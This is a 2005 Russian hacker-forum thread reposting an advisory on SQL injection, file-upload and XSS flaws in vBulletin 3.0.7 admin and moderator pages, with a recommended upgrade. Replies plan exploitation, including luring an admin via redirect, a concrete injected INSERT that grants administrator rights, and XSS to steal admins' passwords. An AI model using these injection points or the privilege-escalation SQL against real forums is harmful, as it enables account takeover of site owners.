Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   vBulletin SQL INJ <=3.0.7 (https://forum.antichat.xyz/showthread.php?t=9740)

WizART 27.09.2005 23:01

vBulletin SQL INJ <=3.0.7
 
Код:

Продукт: vBulletin
URL: http://vbulletin.com
Версия: <= vBulletin 3.0.7
Уязвимость: SQL-инъекция и загрузка произвольных файлов

SQL-Injection:

/joinrequests.php:
POST: <do=processjoinrequests&usergroupid=22&request[[SQL-Injection]]=0>
/modcp/announcement.php:
POST: <do=update&announcementid=1&start=24-07-05&end=30-07-05
&announcement[0]=[SQL-Injection]>
/modcp/thread.php:
POST: <do=dothreads&thread[forumid]=0XF>
POST: <do=dothreadssel&criteria=a:1:{s:7:"forumid";s:5:"aaaa'";}>
/modcp/user.php:
GET: <do=avatar&userid=0XF>

/admincp/admincalendar.php:
GET: <do=addcustom&calendarcustomfieldid=[SQL-Injection]>
GET: <do=addmod&calendarid=[SQL-Injection]>
GET: <do=addmod&calendarid=1&moderatorid=[SQL-Injection]>
GET: <do=deletecustom&calendarcustomfieldid=[SQL-Injection]>
POST: <do=doremoveholiday&holidayid=[SQL-Injection]>
GET: <do=edit&calendarid=[SQL-Injection]>
POST: <do=kill&calendarid=[SQL-Injection]>
POST: <do=killmod&$calendarmoderatorid=[SQL-Injection]>
GET: <do=remove&calendarid=[SQL-Injection]>
POST: <do=removemod&moderatorid=[SQL-Injection]>
POST: <do=saveholiday&holidayinfo[title]=sepro&holidayid=0XF>
POST: <do=update&calendar[daterange]=2002-2008&calendarid=0XF>
GET: <do=updateholiday&holidayid=0XF>
POST: <do=update&calendarid=1&calendar[daterange]=1970-2030&
calendar[0]=[SQL-Injection]>
POST: <do=updatemod&calendarid=1&moderatorid=[SQL-Injection]>
POST: <do=updatemod&moderatorid=1&moderator[calendarid]=[SQL-Injection]>
/admincp/cronlog.php:
POST: <do=doprunelog&cronid=0XF>
POST: <do=prunelog&cronid=0XF>
/admincp/email.php:
POST: <do=makelist&user[usergroupid][0]=[SQL-Injection]>
/admincp/help.php:
POST: <do=doedit&help[script]=1&help[0]=[SQL-Injection]>
/admincp/user.php:
GET: <do=find&orderby=username&limitnumber=[SQL-Injection]>
GET: <do=find&orderby=username&limitstart=[SQL-Injection]>
/admincp/usertitle.php:
GET: <do=edit&usertitleid=0XF>
GET: <do=pmuserstats&ids=0XF>
/admincp/language.php:
POST: <do=update&rvt[0]=[SQL-Injection]>
/admincp/phrase.php:
POST: <do=completeorphans&keep[0]=[SQL-Injection]>
/admincp/template.php:
GET: <do=editstyle&dostyleid=[SQL-Injection]>
GET: <do=editstyle&dostyleid=[SQL-Injection]>
POST: <do=revertall&dostyleid=[SQL-Injection]>
/admincp/thread.php:
POST: <do=dothreads&thread[forumid]=0XF>
/admincp/usertools.php:
POST: <do=updateprofilepic>
/admincp/vbugs_admin.php:
GET: <do=editseverity&vbug_severityid=[SQL-Injection]>
GET: <do=removeseverity&vbug_severityid=[SQL-Injection]>
GET: <do=updateseverity&vbug_severityid=[SQL-Injection]>

Загрузка произвольных файлов:

/admincp/image.php:
POST: <do=upload&table=avatar>
POST: <do=upload&table=icon>
POST: <do=upload&table=smilie>

XSS:

/modcp/index.php:
GET: <do=frames&loc=[XSS]>
/modcp/user.php:
GET: <do=gethost&ip=[XSS]>
/admincp/css.php:
GET: <do=doedit&dostyleid=1&group=[XSS]>
/admincp/index.php:
GET: <redirect=[XSS]>
GET: <do=frames&loc=[XSS]>
/admincp/user.php:
GET: <do=emailpassword&email=[XSS]>
/admincp/usertitle.php:
GET: <do=gethost&ip=[XSS]>
/admincp/language.php:
GET: <do=rebuild&goto=[XSS]>
/admincp/modlog.php:
GET: <do=view&orderby=[XSS]>
/admincp/template.php:
GET: <do=colorconverter&hex=[XSS]>
GET: <do=colorconverter&rgb=[XSS]>
GET: <do=modify&expandset=[XSS]>

Решение: обновить до версии vBulletin 3.0.9

Источник http://www.securityinfo.ru/2005/09/s...vbulletin.html

Mastermind 29.09.2005 15:47

какой смысл всех этих уязвимостей, если их юзанье доступно только модераторам (с доступом в modcp) и админам...

kolorom,
/admincp/image.php - тебе не кажется, что сюда имеет доступ только админ?

Sn_key 29.09.2005 17:06

Отвечаю! Эта уязвимость неактуальна!
Вот линк:
http://forum.antichat.ru/threadnav9723-1-10.html

m0nzt3r 30.09.2005 12:51

ёпт если переносите тему то предупреждайте а то инфа может выйти за пределы=)))
Визарт внимательным надо быть!

SK | Heaton 30.09.2005 14:52

2 m0nzt3r... Секреты есть секреты... лол..

WizART 01.10.2005 18:38

Я то тут причем...я выложил ее перенесли а дальше это уже по вашей косоглазости...

bul666 20.12.2005 14:38

ПОЧЕМУЖЕ не актуальна?!!! Ёмаё! Проявите воображение! Хакеры...
Предпаложим есть SQL inj (GET: <do=addcustom&calendarcustomfieldid=[SQL-Injection]>)... БЕРЕм левый сайт ставим на нем редирект на Эту sql'ку. И вся фишка заключается не выводе на экран всех паролей (Как все привыкли), а например которая вставляет нового админа или меняет его пасс.! ))))))))))

Enter.beta 24.12.2005 02:33

POMOGITE CIUT DODELOT
vot tak ideja v top cto vi regites na forume cto lomajite,
potom delajete etu sql injekciju
Цитата:

INSERT INTO " . TABLE_PREFIX . "administrator (userid, adminpermissions) VALUES (vash_ID, PRAVA)
Po ideje vi polucite prava admina :D
vot kto mozet skazite kakoj TABLE_PREFIX v vB, ato stavit len i kakije prava u korenogo admina obichno tot cto na pervoj stroke v baze dannih

vsio eto obosnovano na 3.5.2 mozet v 3.0.8 podrugomu uvi drugoj versiji ne nashol esli you kogo est vilzite php fail /upload/install/install.php :D

KP0T 24.12.2005 06:50

А Я знаю зачем xss в админке, вот напримеро пасти других админов, такая типа защита от дурака на форуме на тему садо маза.

Enter.beta 24.12.2005 18:08

nda toka admin ili mod kazis mogut zalid sql inj
esli komu interesno vot error
Цитата:

Database error in vBulletin 3.0.7:

Invalid SQL:
SELECT * FROM vb3_calendarcustomfield
WHERE calendarcustomfieldid = 58; INSERT INTO vb3_administrator (userid, adminpermissions) VALUES (2, 65532);

mysql error: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '; INSERT INTO vb3_administrator (userid, adminpermissions) VALU

mysql error number: 1064

Date: Saturday 24th of December 2005 02:04:14 PM
Script: http://localhost/upload/admincp/admincalendar.php?do=addcustom&calendarcustomfield id=58;%20INSERT%20INTO%20vb3_administrator%20(user id,%20adminpermissions)%20VALUES%20(2,%2065532);
Referer: http://localhost/wtf.htm
Username: Admin
IP Address: 127.0.0.1


Время: 13:45